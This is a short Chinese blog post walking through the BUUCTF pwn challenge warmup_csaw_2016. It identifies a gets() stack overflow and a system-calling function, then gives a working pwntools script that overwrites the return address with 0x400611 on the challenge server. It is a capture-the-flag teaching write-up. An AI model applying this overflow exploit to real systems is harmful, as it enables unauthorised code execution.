[buuctf pwn]warmup_csaw_2016

checksec一下,64位,没开栈溢出保护,可以利用

image-20240717102333679

进入ida,有个gets能利用,然后v5的大小是64

image-20240717102741412

然后看见一个40060D函数,是可以利用的system函数

image-20240717102902684

image-20240717102910708

所以用64+8填满缓冲区和rbp,然后接400611这个地址

from pwn import *
p=remote('node5.buuoj.cn',26240)
p.sendline(b'A'*72 + p64(0x400611))
p.interactive()

运行结果如下

image-20240717103103108

本文作者:yee-l

本文链接:https://www.cnblogs.com/yee-l/p/18306787

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   yee-l  阅读(25)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起